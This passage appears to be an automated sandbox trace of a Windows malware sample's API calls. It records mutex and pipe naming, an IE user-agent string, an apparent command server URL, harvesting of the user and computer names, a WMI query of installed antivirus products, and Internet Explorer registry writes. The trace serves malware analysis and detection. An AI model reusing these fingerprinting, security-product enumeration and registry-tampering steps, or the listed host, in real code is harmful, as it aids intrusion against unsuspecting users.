(in: _Dest=0x2f11a50, _Count=0x27, _Format="{%08X-%04X-%04X-%04X-%08X%04X}" | out: _Dest="{022B7998-1542-BEE5-32E6-4548B44849D1}") returned 38 [0047.427] lstrlenW (lpString="\\\\.\\pipe\\") returned 9 [0047.427] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x60) returned 0x2f11aa8 [0047.427] lstrcpyW (in: lpString1=0x2f11aa8, lpString2="\\\\.\\pipe\\" | out: lpString1="\\\\.\\pipe\\") returned="\\\\.\\pipe\\" [0047.427] lstrcatW (in: lpString1="\\\\.\\pipe\\", lpString2="{022B7998-1542-BEE5-32E6-4548B44849D1}" | out: lpString1="\\\\.\\pipe\\{022B7998-1542-BEE5-32E6-4548B44849D1}") returned="\\\\.\\pipe\\{022B7998-1542-BEE5-32E6-4548B44849D1}" [0047.427] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f11a50 | out: hHeap=0x1f30000) returned 1 [0047.427] GetCurrentProcessId () returned 0xb08 [0047.427] ProcessIdToSessionId (in: dwProcessId=0xb08, pSessionId=0x18fec4 | out: pSessionId=0x18fec4) returned 1 [0047.427] _snwprintf (in: _Dest=0x2f11abe, _Count=0x5, _Format="%05u" | out: _Dest="0000198-1542-BEE5-32E6-4548B44849D1}") returned 5 [0047.428] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4e) returned 0x2f11a50 [0047.428] _snwprintf (in: _Dest=0x2f11a50, _Count=0x27, _Format="%08X-%04X-%04X-%04X-%08X%04X" | out: _Dest="C3D4178C-1366-22F7-B32E-AFA726D57EDB") returned 36 [0047.428] lstrlenW (lpString="Local\\") returned 6 [0047.428] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x5a) returned 0x2f12310 [0047.428] lstrcpyW (in: lpString1=0x2f12310, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0047.428] lstrcatW (in: lpString1="Local\\", lpString2="C3D4178C-1366-22F7-B32E-AFA726D57EDB" | out: lpString1="Local\\C3D4178C-1366-22F7-B32E-AFA726D57EDB") returned="Local\\C3D4178C-1366-22F7-B32E-AFA726D57EDB" [0047.428] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f11a50 | out: hHeap=0x1f30000) returned 1 [0047.428] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4e) returned 0x2f11a50 [0047.428] _snwprintf (in: _Dest=0x2f11a50, _Count=0x27, _Format="%08X-%04X-%04X-%04X-%08X%04X" | out: _Dest="0AB51D07-5B88-3AFE-0EA1-26B1B372042D") returned 36 [0047.429] lstrlenW (lpString="Local\\") returned 6 [0047.429] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x5a) returned 0x2f12378 [0047.429] lstrcpyW (in: lpString1=0x2f12378, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0047.429] lstrcatW (in: lpString1="Local\\", lpString2="0AB51D07-5B88-3AFE-0EA1-26B1B372042D" | out: lpString1="Local\\0AB51D07-5B88-3AFE-0EA1-26B1B372042D") returned="Local\\0AB51D07-5B88-3AFE-0EA1-26B1B372042D" [0047.429] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f11a50 | out: hHeap=0x1f30000) returned 1 [0047.429] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4e) returned 0x2f11a50 [0047.429] _snwprintf (in: _Dest=0x2f11a50, _Count=0x27, _Format="%08X-%04X-%04X-%04X-%08X%04X" | out: _Dest="71839DCA-3134-54D3-0FBE-288DDB014537") returned 36 [0047.429] lstrlenW (lpString="Local\\") returned 6 [0047.429] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x5a) returned 0x2f123e0 [0047.429] lstrcpyW (in: lpString1=0x2f123e0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0047.429] lstrcatW (in: lpString1="Local\\", lpString2="71839DCA-3134-54D3-0FBE-288DDB014537" | out: lpString1="Local\\71839DCA-3134-54D3-0FBE-288DDB014537") returned="Local\\71839DCA-3134-54D3-0FBE-288DDB014537" [0047.429] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f11a50 | out: hHeap=0x1f30000) returned 1 [0047.429] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa4 [0047.430] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x208) returned 0x2f12448 [0047.430] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x2f12448, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iexuao.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iexuao.exe")) returned 0x30 [0047.435] _wcsupr (in: _String=0x2f12494 | out: _String="IEXUAO.EXE") returned="IEXUAO.EXE" [0047.435] lstrlenW (lpString="IEXUAO.EXE") returned 10 [0047.435] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1a, ProcessInformation=0x18feec, ProcessInformationLength=0x4, ReturnLength=0x18fee0 | out: ProcessInformation=0x18feec, ReturnLength=0x18fee0) returned 0x0 [0047.435] GetTickCount () returned 0x1146ae4 [0047.435] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x39c) returned 0x506258 [0047.436] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f2958 | out: hHeap=0x4e0000) returned 1 [0047.436] CreateMutexW (lpMutexAttributes=0x2f11830, bInitialOwner=1, lpName="Local\\71839DCA-3134-54D3-0FBE-288DDB014537") returned 0xa8 [0047.437] GetLastError () returned 0x0 [0047.437] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xa0) returned 0x2f12658 [0047.437] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4e) returned 0x2f11a50 [0047.437] wsprintfA (in: param_1=0x2f11a50, param_2="Mozilla/5.0 (Windows NT %u.%u%s; Trident/7.0; rv:11.0) like Gecko" | out: param_1="Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 73 [0047.438] lstrlenA (lpString="index.html") returned 10 [0047.438] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xb) returned 0x2f12700 [0047.438] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x1a7) returned 0x2f12718 [0047.438] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x110) returned 0x2f128c8 [0047.491] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x120) returned 0x2f129e0 [0047.491] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f128c8 | out: hHeap=0x1f30000) returned 1 [0047.491] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f12718 | out: hHeap=0x1f30000) returned 1 [0047.492] StrToIntExA (in: pszString="10", dwFlags=0x0, piRet=0x18ff1c | out: piRet=0x18ff1c) returned 1 [0047.493] StrToIntExA (in: pszString="10", dwFlags=0x0, piRet=0x18ff1c | out: piRet=0x18ff1c) returned 1 [0047.493] StrToIntExA (in: pszString="201910301", dwFlags=0x0, piRet=0x18ff1c | out: piRet=0x18ff1c) returned 1 [0047.493] StrToIntExA (in: pszString="12", dwFlags=0x0, piRet=0x18ff1c | out: piRet=0x18ff1c) returned 1 [0047.493] StrToIntExA (in: pszString="60", dwFlags=0x0, piRet=0x18ff1c | out: piRet=0x18ff1c) returned 1 [0047.493] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x18) returned 0x2f12718 [0047.493] mbstowcs (in: _Dest=0x2f12718, _Source="new", _MaxCount=0x3 | out: _Dest="newdz鹼㫳茡ꮞ꣭꠻忈䷔ꖈ") returned 0x3 [0047.493] mbstowcs (in: _Dest=0x2f1271e, _Source="date", _MaxCount=0x5 | out: _Dest="date") returned 0x4 [0047.494] CreateWaitableTimerW (lpTimerAttributes=0x0, bManualReset=1, lpTimerName=0x0) returned 0xac [0047.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fed0 | out: lpSystemTimeAsFileTime=0x18fed0*(dwLowDateTime=0x43fb5d0, dwHighDateTime=0x1d61242)) [0047.494] SetWaitableTimer (hTimer=0xac, lpDueTime=0x18fed0, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0047.494] lstrlenA (lpString="ZWnFGQIMBs7ki14C") returned 16 [0047.494] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x11) returned 0x2f12738 [0047.495] lstrlenA (lpString="https://jamesdrywall.xyz") returned 24 [0047.495] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x250000 [0047.495] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4) returned 0x2f12758 [0047.495] StrTrimA (in: psz="https://jamesdrywall.xyz", pszTrimChars="\x09 " | out: psz="https://jamesdrywall.xyz") returned 0 [0047.496] lstrlenA (lpString="index.htm") returned 9 [0047.496] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xa) returned 0x2f12768 [0047.496] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f129e0 | out: hHeap=0x1f30000) returned 1 [0047.496] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x18ff20 | out: lpBuffer=0x0, pcbBuffer=0x18ff20) returned 0 [0047.515] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x2a) returned 0x2f12780 [0047.515] GetUserNameW (in: lpBuffer=0x2f12780, pcbBuffer=0x18ff20 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18ff20) returned 1 [0047.515] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f12780 | out: hHeap=0x1f30000) returned 1 [0047.515] GetComputerNameW (in: lpBuffer=0x0, nSize=0x18ff20 | out: lpBuffer=0x0, nSize=0x18ff20) returned 0 [0047.516] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x14) returned 0x2f12780 [0047.516] GetComputerNameW (in: lpBuffer=0x2f12780, nSize=0x18ff20 | out: lpBuffer="XDUWTFONO", nSize=0x18ff20) returned 1 [0047.518] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f12780 | out: hHeap=0x1f30000) returned 1 [0047.519] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0047.988] CreateWaitableTimerA (lpTimerAttributes=0x0, bManualReset=1, lpTimerName=0x0) returned 0xec [0047.988] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fed8 | out: lpSystemTimeAsFileTime=0x18fed8*(dwLowDateTime=0x4552230, dwHighDateTime=0x1d61242)) [0047.988] SetWaitableTimer (hTimer=0xec, lpDueTime=0x18fed8, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0047.988] WaitForMultipleObjects (nCount=0x2, lpHandles=0x18ff10*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0058.006] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x18fed8 | out: ppstm=0x18fed8*=0x4f5340) returned 0x0 [0058.010] CoCreateInstance (in: rclsid=0x2f10f30*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2f10f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18fe80 | out: ppv=0x18fe80*=0x30b0828) returned 0x0 [0058.673] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30b0828, strNetworkResource="root\\securitycenter2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x18fe84 | out: ppNamespace=0x18fe84*=0x30bcfe4) returned 0x0 [0063.582] CoSetProxyBlanket (pProxy=0x30bcfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0063.582] WbemLocator:IUnknown:Release (This=0x30b0828) returned 0x0 [0063.583] IWbemServices:ExecQuery (in: This=0x30bcfe4, strQueryLanguage="WQL", strQuery="select * from antispywareproduct", lFlags=0, pCtx=0x0, ppEnum=0x18fed0 | out: ppEnum=0x18fed0*=0x30bc754) returned 0x0 [0063.617] IEnumWbemClassObject:Next (in: This=0x30bc754, lTimeout=-1, uCount=0x1, apObjects=0x18fedc, puReturned=0x18fecc | out: apObjects=0x18fedc*=0x30bcff8, puReturned=0x18fecc*=0x1) returned 0x0 [0063.627] IWbemClassObject:Get (in: This=0x30bcff8, wszName="displayname", lFlags=0, pVal=0x18feb8*(varType=0xfee4, wReserved1=0x18, wReserved2=0xfed8, wReserved3=0x18, varVal1=0x76d44238, varVal2=0x2), pType=0x0, plFlavor=0x0 | out: pVal=0x18feb8*(varType=0x8, wReserved1=0x18, wReserved2=0xfed8, wReserved3=0x18, varVal1="Windows Defender", varVal2=0x2), pType=0x0, plFlavor=0x0) returned 0x0 [0063.627] lstrlenW (lpString="Windows Defender") returned 16 [0063.628] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x22) returned 0x2f12780 [0063.628] IWbemClassObject:Get (in: This=0x30bcff8, wszName="pathtosignedproductexe", lFlags=0, pVal=0x18feb8*(varType=0x8, wReserved1=0x18, wReserved2=0xfed8, wReserved3=0x18, varVal1="Windows Defender", varVal2=0x2), pType=0x0, plFlavor=0x0 | out: pVal=0x18feb8*(varType=0x8, wReserved1=0x18, wReserved2=0xfed8, wReserved3=0x18, varVal1="%ProgramFiles%\\Windows Defender\\MSASCui.exe", varVal2=0x2), pType=0x0, plFlavor=0x0) returned 0x0 [0063.628] lstrlenW (lpString="%ProgramFiles%\\Windows Defender\\MSASCui.exe") returned 43 [0063.628] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x58) returned 0x2f127b0 [0063.629] IWbemClassObject:Get (in: This=0x30bcff8, wszName="productstate", lFlags=0, pVal=0x18feb8*(varType=0x8, wReserved1=0x18, wReserved2=0xfed8, wReserved3=0x18, varVal1="%ProgramFiles%\\Windows Defender\\MSASCui.exe", varVal2=0x2), pType=0x0, plFlavor=0x0 | out: pVal=0x18feb8*(varType=0x3, wReserved1=0x18, wReserved2=0xfed8, wReserved3=0x18, varVal1=0x61110, varVal2=0x2), pType=0x0, plFlavor=0x0) returned 0x0 [0063.629] lstrlenW (lpString="Windows Defender") returned 16 [0063.629] lstrlenW (lpString="%ProgramFiles%\\Windows Defender\\MSASCui.exe") returned 43 [0063.629] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xea) returned 0x2f12810 [0063.629] wsprintfW (in: param_1=0x2f12810, param_2="Name=\"%s\", State=0x%x, Enabled=%u, Updated=%u, Path=\"%s\"\n" | out: param_1="Name=\"Windows Defender\", State=0x61110, Enabled=1, Updated=1, Path=\"%ProgramFiles%\\Windows Defender\\MSASCui.exe\"\n") returned 113 [0063.630] ISequentialStream:RemoteWrite (in: This=0x4f5340, pv=0x2f12810*=0x4e, cb=0xe2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0063.630] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f12810 | out: hHeap=0x1f30000) returned 1 [0063.630] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f127b0 | out: hHeap=0x1f30000) returned 1 [0063.630] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f12780 | out: hHeap=0x1f30000) returned 1 [0063.630] IUnknown:Release (This=0x30bcff8) returned 0x0 [0063.630] IEnumWbemClassObject:Next (in: This=0x30bc754, lTimeout=-1, uCount=0x1, apObjects=0x18fedc, puReturned=0x18fecc | out: apObjects=0x18fedc*=0x30bcff8, puReturned=0x18fecc*=0x0) returned 0x1 [0063.634] IUnknown:Release (This=0x30bc754) returned 0x0 [0063.640] WbemLocator:IUnknown:Release (This=0x30bcfe4) returned 0x0 [0063.641] ISequentialStream:RemoteWrite (in: This=0x4f5340, pv=0x24c210*=0xa, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0063.642] IStream:RemoteSeek (in: This=0x4f5340, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0063.642] IStream:Stat (in: This=0x4f5340, pstatstg=0x18fe38, grfStatFlag=0x1 | out: pstatstg=0x18fe38) returned 0x0 [0063.642] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xe6) returned 0x2f12780 [0063.642] ISequentialStream:RemoteRead (in: This=0x4f5340, pv=0x2f12780, cb=0xe4, pcbRead=0x18fe84 | out: pv=0x2f12780*=0x4e, pcbRead=0x18fe84*=0xe4) returned 0x0 [0063.642] IUnknown:Release (This=0x4f5340) returned 0x0 [0063.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fee0 | out: lpSystemTimeAsFileTime=0x18fee0*(dwLowDateTime=0xabf96f0, dwHighDateTime=0x1d61242)) [0063.642] CoCreateInstance (in: rclsid=0x2f10f30*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2f10f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18fe50 | out: ppv=0x18fe50*=0x30b0880) returned 0x0 [0063.642] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30b0880, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x18fe54 | out: ppNamespace=0x18fe54*=0x30bcfe4) returned 0x0 [0063.674] CoSetProxyBlanket (pProxy=0x30bcfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0063.675] WbemLocator:IUnknown:Release (This=0x30b0880) returned 0x0 [0063.676] IWbemServices:GetObject (in: This=0x30bcfe4, strObjectPath="", lFlags=0, pCtx=0x0, ppObject=0x18fe78, ppCallResult=0x0 | out: ppObject=0x18fe78*=0x30c5858, ppCallResult=0x0) returned 0x0 [0063.713] IWbemClassObject:GetMethod (in: This=0x30c5858, wszName="SetDWORDValue", lFlags=0, ppInSignature=0x18fe80, ppOutSignature=0x0 | out: ppInSignature=0x18fe80*=0x30c5fd8, ppOutSignature=0x0) returned 0x0 [0063.716] IWbemClassObject:Put (This=0x30c5fd8, wszName="hDefKey", lFlags=0, pVal=0x18fe30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0063.723] IWbemClassObject:Put (This=0x30c5fd8, wszName="sSubKeyName", lFlags=0, pVal=0x18fe30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0063.724] IWbemClassObject:Put (This=0x30c5fd8, wszName="sValueName", lFlags=0, pVal=0x18fe30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE10RunOnceLastShown", varVal2=0x0), Type=0) returned 0x0 [0063.724] IWbemClassObject:Put (This=0x30c5fd8, wszName="uValue", lFlags=0, pVal=0x18feb0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), Type=0) returned 0x0 [0063.724] IWbemServices:ExecMethod (in: This=0x30bcfe4, strObjectPath="", strMethodName="SetDWORDValue", lFlags=0, pCtx=0x0, pInParams=0x30c5fd8, ppOutParams=0x18fe84*=0x0, ppCallResult=0x0 | out: ppOutParams=0x18fe84*=0x30c5bb0, ppCallResult=0x0) returned 0x0 [0065.059] IWbemClassObject:Get (in: This=0x30c5bb0, wszName="ReturnValue", lFlags=0, pVal=0x18fe50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18fe50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0065.059] IUnknown:Release (This=0x30c5bb0) returned 0x0 [0065.059] IUnknown:Release (This=0x30c5fd8) returned 0x0 [0065.060] IUnknown:Release (This=0x30c5858) returned 0x0 [0065.060] WbemLocator:IUnknown:Release (This=0x30bcfe4) returned 0x0 [0065.062] CoCreateInstance (in: rclsid=0x2f10f30*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2f10f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18fe28 | out: ppv=0x18fe28*=0x30b0880) returned 0x0 [0065.063] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30b0880, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x18fe2c | out: ppNamespace=0x18fe2c*=0x30bcfe4) returned 0x0 [0065.076] CoSetProxyBlanket (pProxy=0x30bcfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0065.077] WbemLocator:IUnknown:Release (This=0x30b0880) returned 0x0 [0065.077] IWbemServices:GetObject (in: This=0x30bcfe4, strObjectPath="", lFlags=0, pCtx=0x0, ppObject=0x18fe50, ppCallResult=0x0 | out: ppObject=0x18fe50*=0x30c5858, ppCallResult=0x0) returned 0x0 [0065.084] IWbemClassObject:GetMethod (in: This=0x30c5858, wszName="SetBinaryValue", lFlags=0, ppInSignature=0x18fe58, ppOutSignature=0x0 | out: ppInSignature=0x18fe58*=0x30c5fd8, ppOutSignature=0x0) returned 0x0 [0065.086] IWbemClassObject:Put (This=0x30c5fd8, wszName="hDefKey", lFlags=0, pVal=0x18fe08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0065.087] IWbemClassObject:Put (This=0x30c5fd8, wszName="sSubKeyName", lFlags=0, pVal=0x18fe08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0065.087] IWbemClassObject:Put (This=0x30c5fd8, wszName="sValueName", lFlags=0, pVal=0x18fe08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE10RunOnceLastShown_TIMESTAMP", varVal2=0x0), Type=0) returned 0x0 [0065.087] IWbemClassObject:Put (This=0x30c5fd8, wszName="uValue", lFlags=0, pVal=0x18fe88*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5150c0*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x4fe628*, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0x0), Type=0) returned 0x0 [0065.088] IWbemServices:ExecMethod (in: This=0x30bcfe4, strObjectPath="", strMethodName="", lFlags=0, pCtx=0x0, pInParams=0x30c5fd8, ppOutParams=0x18fe5c*=0x0, ppCallResult=0x0 | out: ppOutParams=0x18fe5c*=0x30c5bb0, ppCallResult=0x0) returned 0x0 [0065.109] IWbemClassObject:Get (in: This=0x30c5bb0, wszName="ReturnValue", lFlags=0, pVal=0x18fe28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18fe28*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0065.109] IUnknown:Release (This=0x30c5bb0) returned 0x0 [0065.109] IUnknown:Release (This=0x30c5fd8) returned 0x0 [0065.109] IUnknown:Release (This=0x30c5858) returned 0x0 [0065.109] WbemLocator:IUnknown:Release (This=0x30bcfe4) returned 0x0 [0065.110] CoCreateInstance (in: rclsid=0x2f10f30*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2f10f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18fe50 | out: ppv=0x18fe50*=0x30b0880) returned 0x0 [0065.110] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30b0880, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x18fe54 | out: ppNamespace=0x18fe54*=0x30bcfe4) returned 0x0 [0065.124] CoSetProxyBlanket (pProxy=0x30bcfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0065.124] WbemLocator:IUnknown:Release (This=0x30b0880) returned 0x0 [0065.124] IWbemServices:GetObject (in: This=0x30bcfe4, strObjectPath="", lFlags=0, pCtx=0x0, ppObject=0x18fe78, ppCallResult=0x0 | out: ppObject=0x18fe78*=0x30c5858, ppCallResult=0x0) returned 0x0 [0065.131] IWbemClassObject:GetMethod (in: This=0x30c5858, wszName="SetDWORDValue", lFlags=0, ppInSignature=0x18fe80, ppOutSignature=0x0 | out: ppInSignature=0x18fe80*=0x30c5fd8, ppOutSignature=0x0) returned 0x0 [0065.131] IWbemClassObject:Put (This=0x30c5fd8, wszName="hDefKey", lFlags=0, pVal=0x18fe30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0065.131] IWbemClassObject:Put (This=0x30c5fd8, wszName="sSubKeyName", lFlags=0, pVal=0x18fe30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0065.131] IWbemClassObject:Put (This=0x30c5fd8, wszName="sValueName", lFlags=0, pVal=0x18fe30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE8RunOnceLastShown", varVal2=0x0), Type=0) returned 0x0 [0065.131] IWbemClassObject:Put (This=0x30c5fd8, wszName="uValue", lFlags=0, pVal=0x18feb0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), Type=0) returned 0x0 [0065.131] IWbemServices:ExecMethod (in: This=0x30bcfe4, strObjectPath="", strMethodName="SetDWORDValue", lFlags=0, pCtx=0x0, pInParams=0x30c5fd8, ppOutParams=0x18fe84*=0x0, ppCallResult=0x0 | out: ppOutParams=0x18fe84*=0x30c5bb0, ppCallResult=0x0) returned 0x0 [0065.150] IWbemClassObject:Get (in: This=0x30c5bb0, wszName="ReturnValue", lFlags=0, pVal=0x18fe50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18fe50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0065.150] IUnknown:Release (This=0x30c5bb0) returned 0x0 [0065.150] IUnknown:Release (This=0x30c5fd8) returned 0x0 [0065.150] IUnknown:Release (This=0x30c5858) returned 0x0 [0065.150] WbemLocator:IUnknown:Release (This=0x30bcfe4) returned 0x0 [0065.151] CoCreateInstance (in: rclsid=0x2f10f30*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, 